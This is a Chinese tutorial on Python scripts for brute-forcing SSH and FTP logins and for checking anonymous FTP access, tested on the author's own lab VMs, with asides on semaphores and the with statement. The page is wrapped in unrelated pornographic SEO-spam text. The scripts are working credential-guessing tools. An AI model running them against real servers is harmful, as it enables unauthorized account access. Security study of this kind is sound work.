国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

Python中FTP服務與SSH登錄暴力破解的實現

瀏覽:19日期:2022-07-28 11:34:55
目錄前言SSH爆破腳本演示信號量類with 用法FTP爆破服務搭建匿名掃描暴力破解總結前言

本文繼續學習下 Python 編程在網絡攻防領域的應用,主要是通過 Python 腳本進行 SSH 登錄爆破和 FTP 服務登錄爆破。

SSH爆破

演示環境借助 Kali 虛擬機進行自身的 SSH 服務的登錄爆破,注意提前修改/etc/ssh/sshd_config配置文件并執行命令service ssh start運行 SSH 服務。

腳本演示

先來看看代碼:

from pexpect import pxsshimport argparseimport threadingimport sysmaxConnetions = 5connect_lock = threading.BoundedSemaphore(value=maxConnetions)def connect(host, user, password): try:s = pxssh.pxssh()# 登錄ssh測試s.login(host, user, password)print('[+] Password Found: {}'.format(password))sys.exit(0) except pxssh.ExceptionPxssh as e:passdef main(): # 定義腳本的運行參數、獲取用戶輸入的對應參數值 parser = argparse.ArgumentParser() parser.add_argument(’-H’, dest=’Host’, help='like: 192.168.3.1') parser.add_argument(’-F’, dest=’passwdFile’, help='like: /root/pass.txt') parser.add_argument(’-u’, dest=’user’) args = parser.parse_args() host = args.Host passwdFile = args.passwdFile user = args.user # 讀取字典文件、使用多線程進行口令爆破 with open(passwdFile, ’r’) as f:for line in f.readlines(): with connect_lock:password = line.strip(’n’)print('[-] Testing: {}'.format(password))# 起線程每個密碼嘗試登錄一次t = threading.Thread(target=connect, args=(host, user, password))t.start()main()

在 Kali 終端運行,運行腳本可使用 -h 參數獲得提示,效果如下:

Python中FTP服務與SSH登錄暴力破解的實現

最終暴力破解獲得密碼 root:

Python中FTP服務與SSH登錄暴力破解的實現

上述腳本開啟 5 個線程連接,開啟線程速度會更快是因為這里要遠程連接,等待網絡有阻塞,故開啟多線程可以加快速度(實際上多線程是一個 CPU 在交替運行)。

信號量類

注意到代碼中使用threading.BoundedSemaphore(value=maxConnetions)來控制最大線程數量,下面來學習下相關語法知識。

Python 的 threading 線程模塊中的 Semaphore 類和 BoundedSemaphore 類來實現并發限制。

Semaphore 類和 BoundedSemaphore 類都是信號量類,每次有線程獲得信號量(即 acquire() )的時候計數器 -1,釋放信號量(release())時候計數器+1,計數器為 0 的時候其它線程就被阻塞無法獲得信號量; 當計數器為設定好的上限的時候 BoundedSemaphore 就無法進行 release() 操作了,而 Semaphore 沒有這個限制檢查。

下面直接通過這兩個類的簡單示例來學習理解下這兩個類在線程控制中的意義。

1、首先看看 Semaphore 類:

# coding: utf-8import threadingimport timedef fun(semaphore, num): # 獲得信號量,信號量減一 semaphore.acquire() print('Thread %d is running.' % num) time.sleep(3) # 釋放信號量,信號量加一 semaphore.release()if __name__==’__main__’: # 初始化信號量,數量為2 semaphore = threading.Semaphore(2) # 運行4個線程 for num in range(4):t = threading.Thread(target=fun, args=(semaphore, num))t.start()

代碼運行效果:

Python中FTP服務與SSH登錄暴力破解的實現

可以注意到線程 0 和 1 是一起打印出消息的,而線程 2 和 3 是在 3 秒后打印的,可以得出每次只有 2 個線程獲得信號量,進行打印。

2、接下來看看 BoundedSemaphore 類:

# encoding: UTF-8import threadingimport timedef showfun(n): print('%s start -- %d'%(time.ctime(),n)) print('working') time.sleep(2) print('%s end -- %d' % (time.ctime(), n)) semlock.release()if __name__ == ’__main__’: maxconnections = 5 semlock = threading.BoundedSemaphore(maxconnections) list=[] for i in range(8):semlock.acquire()t=threading.Thread(target=showfun, args=(i,))list.append(t)t.start()

看看代碼運行效果:

Sun Aug 8 18:59:37 2021 start -- 0workingSun Aug 8 18:59:37 2021 start -- 1workingSun Aug 8 18:59:37 2021 start -- 2workingSun Aug 8 18:59:37 2021 start -- 3workingSun Aug 8 18:59:37 2021 start -- 4workingSun Aug 8 18:59:39 2021 end -- 0Sun Aug 8 18:59:39 2021 end -- 1Sun Aug 8 18:59:39 2021 end -- 2Sun Aug 8 18:59:39 2021 end -- 3Sun Aug 8 18:59:39 2021 end -- 4Sun Aug 8 18:59:39 2021 start -- 5workingSun Aug 8 18:59:39 2021 start -- 6workingSun Aug 8 18:59:39 2021 start -- 7workingSun Aug 8 18:59:41 2021 end -- 5Sun Aug 8 18:59:41 2021 end -- 6Sun Aug 8 18:59:41 2021 end -- 7

線程數限制到 5 個,因此等待 0-4 完畢之后 5-7 才能請求到資源進行執行。

with 用法

上面代碼中注意到還使用了with connect_lock:語句進行信號量的管理,故來學習下 with 關鍵詞的使用。在 Python 中,with 語句適用于對資源進行訪問的場合,確保不管使用過程中是否發生異常都會執行必要的“清理”操作,釋放資源,比如文件使用后自動關閉/線程中鎖的自動獲取和釋放等。

1、問題引出

如下代碼:

file = open('1.txt')data = file.read()file.close()

上面代碼存在2個問題:

文件讀取發生異常,但沒有進行任何處理; 可能忘記關閉文件句柄;

2、代碼改進

try: f = open(’xxx’)except: print(’fail to open’) exit(-1)try: do somethingexcept: do somethingfinally: f.close()

雖然這段代碼運行良好,但比較冗長。而使用 with 的話,能夠減少冗長,還能自動處理上下文環境產生的異常,如下面代碼:

with open('1.txt') as file: data = file.read()

3、with 工作原理

緊跟 with 后面的語句被求值后,返回對象的 “–enter–()” 方法被調用,這個方法的返回值將被賦值給 as 后面的變量; 當with后面的代碼塊全部被執行完之后,將調用前面返回對象的 “–exit–()” 方法。

with 工作原理代碼示例:

class Sample: def __enter__(self):print 'in __enter__'return 'Foo' def __exit__(self, exc_type, exc_val, exc_tb):print 'in __exit__'def get_sample(): return Sample()with get_sample() as sample: print 'Sample: ', sample

代碼的運行結果如下:

in __enter__Sample: Fooin __exit__

4、with 作用小結

with 看起來如此簡單,但是其背后還有一些工作要做,因為你不能對 python 的任意對象使用 with,它僅能工作于支持上下文管理協議的對象。只有內建了“上下文管理”的對象可以和 with 一起工作,目前支持該協議的對象有:

filedecimal.Contextthread.LockTypethreading.Lockthreading.RLockthreading.Conditionthreading.Semaphorethreading.BoundedSemaphore

因為上下文管理器主要作用于共享資源,__enter__()和__exit__()方法干的基本是需要分配和釋放資源的低層次工作,比如數據庫連接、鎖分配、信號量加/減、狀態管理、文件打開和關閉、異常處理等。

FTP爆破

FTP(File Transfer Protocol)即文件傳輸協議,是一種基于 TCP 的協議,采用客戶/服務器模式。通過 FTP 協議,用戶可以在FTP服務器中進行文件的上傳或下載等操作。雖然現在通過 HTTP 協議下載的站點有很多,但是由于FTP協議可以很好地控制用戶數量和寬帶的分配,快速方便地上傳、下載文件,因此FTP已成為網絡中文件上傳和下載的首選服務器。

服務搭建

下面演示在 Win10 虛擬機搭建 FTP 服務。

1、打開的【Windows功能】,將 Internet 信息服務的 4 個子功能打勾“√”,然后點擊【確定】按鈕安裝這些功能,圖示如下:

Python中FTP服務與SSH登錄暴力破解的實現

2、在系統安裝配置完成后,打開 IIS 管理器,點擊【添加FTP站點】,圖示如下:

Python中FTP服務與SSH登錄暴力破解的實現3、

輸入 FTP 站點名稱,以及允許用戶訪問的目錄路徑,圖示如下:

Python中FTP服務與SSH登錄暴力破解的實現

4、在【綁定】IP 中輸入你本機的 IP 地址,選擇“無SSL”,圖示如下:

Python中FTP服務與SSH登錄暴力破解的實現

5、身份驗證選擇“基本”,指定 Win10 的用戶 True 可登錄,完成配置:

Python中FTP服務與SSH登錄暴力破解的實現

6、物理機瀏覽器輸入 ftp://win10虛擬機ip,即可訪問創建的 ftp 服務,需要輸入賬戶密碼:

Python中FTP服務與SSH登錄暴力破解的實現

7、驗證完賬戶密碼,即可看到 FTP 服務的目錄:

Python中FTP服務與SSH登錄暴力破解的實現

點擊查看具體文件內容:

Python中FTP服務與SSH登錄暴力破解的實現

以上便在局域網內部的 Win10 虛擬機搭建了 FTP 服務,并指定了登錄用戶為 True。

補充一個概念:匿名FTP服務

匿名 FTP 是這樣一種機制:用戶可通過它連接到遠程主機上,并從其下載文件,而無需成為其注冊用戶。系統管理員建立了一個特殊的用戶 ID,名為anonymous, Internet 上的任何人在任何地方都可使用該用戶 ID。

通過 FTP 程序連接匿名 FTP 主機的方式同連接普通 FTP 主機的方式差不多,只是在要求提供用戶標識 ID 時必須輸入anonymous,該用戶 ID 的口令可以是任意的字符串。習慣上,用自己的 E-mail 地址作為口令,使系統維護程序能夠記錄下來誰在存取這些文件。

匿名掃描

下面先來演示下借助腳本測試 FTP 服務器是否啟用匿名登錄:

# coding=utf-8import ftplibdef ftpLogin(hostname): try:ftp = ftplib.FTP(hostname)ftp.login(’anonymous’, ’[email protected]’)print(’[*] ’ + str(hostname) + ’ FTP Anonymous Logon Succeeded.’)ftp.quit()exit(0) except Exception as e:print(’[-] FTP Anonymous Logon Failed.’,e)if __name__ == '__main__': ftpLogin('192.168.66.101')

代碼運行結果,可見當前 FTP 服務器并不支持匿名登錄:

Python中FTP服務與SSH登錄暴力破解的實現

可更改 Win10 虛擬機的 FTP 服務配置,啟用匿名登錄:

Python中FTP服務與SSH登錄暴力破解的實現

暴力破解

下面來對 FTP 服務的 True 賬戶的密碼進行暴力破解:

# coding=utf-8import ftplibdef BruteLogin(hostname, passwdFile): pF = open(passwdFile, ’r’) for line in pF.readlines():username = line.split(’:’)[0]password = line.split(’:’)[1].strip(’r’).strip(’n’)print(’[+] Trying: ’ + username + ’/’ + password)try: ftp = ftplib.FTP(hostname) ftp.login(username, password) print(’[*] ’ + str(hostname) + ’ FTP Logon Succeeded: ’ + username + ’/’ + password) ftp.quit() exit(0)except Exception as e: pass print(’[-] Could not brubrute force FTP credentials.’) exit(0)if __name__=='__main__': BruteLogin('192.168.66.101', 'pwd.txt')

代碼運行效果如下:

Python中FTP服務與SSH登錄暴力破解的實現

其中密碼字典如下:

Python中FTP服務與SSH登錄暴力破解的實現

總結

本文學習了如何通過 Python 腳本進行 FTP、SSH 服務的登錄爆破,雖然 Kali 自帶了類似的工具,但是主要目的還是鍛煉 Python 編程能力和學習 Python 編程應用。后續還會繼續學習 Python 更多的網絡攻防應用場景!

到此這篇關于Python中FTP服務與SSH登錄暴力破解的實現的文章就介紹到這了,更多相關Python 暴力破解 內容請搜索好吧啦網以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持好吧啦網!

標簽: Python 編程
相關文章:
主站蜘蛛池模板: 九九re6精品视频在线观看 | 日本免费不卡在线一区二区三区 | 波多野一区二区三区在线 | 两性色午夜视频免费国产 | 国产一区二区三区不卡在线观看 | 成人二区| 国产2页 | 国产三级做爰高清视频a | 成人a级 | 国产美女在线一区二区三区 | 在线欧美精品二区三区 | 俄罗斯极品美女毛片免费播放 | 国产精品免费精品自在线观看 | 奇米第四狠狠777高清秒播 | 国产香蕉在线视频一级毛片 | 国产一区二区影院 | 成人自拍视频在线 | 在线免费视频国产 | 一级做a爱过程免费观看 | 久久精品视频3 | 手机在线成人精品视频网 | 在线观看一级毛片 | 久草手机视频在线 | 网站国产 | 日韩经典欧美精品一区 | 好湿好紧好痛a级是免费视频 | 久久91精品国产一区二区 | 精品久久久久久久久久中文字幕 | 国产精品自在欧美一区 | 国产1000部成人免费视频 | 国产大臿蕉香蕉大视频女 | 久草在线视频首页 | 国产大乳孕妇喷奶水在线观看 | 99久久国产免费 - 99久久国产免费 | 欧美日韩精品一区二区三区视频播放 | 欧美 另类 精品一区视频 | 久久国产视屏 | 伊人久久91 | japanese 色系 tube日本 | 中文字幕一区二区三区精品 | 永久黄网站色视频免费观看99 |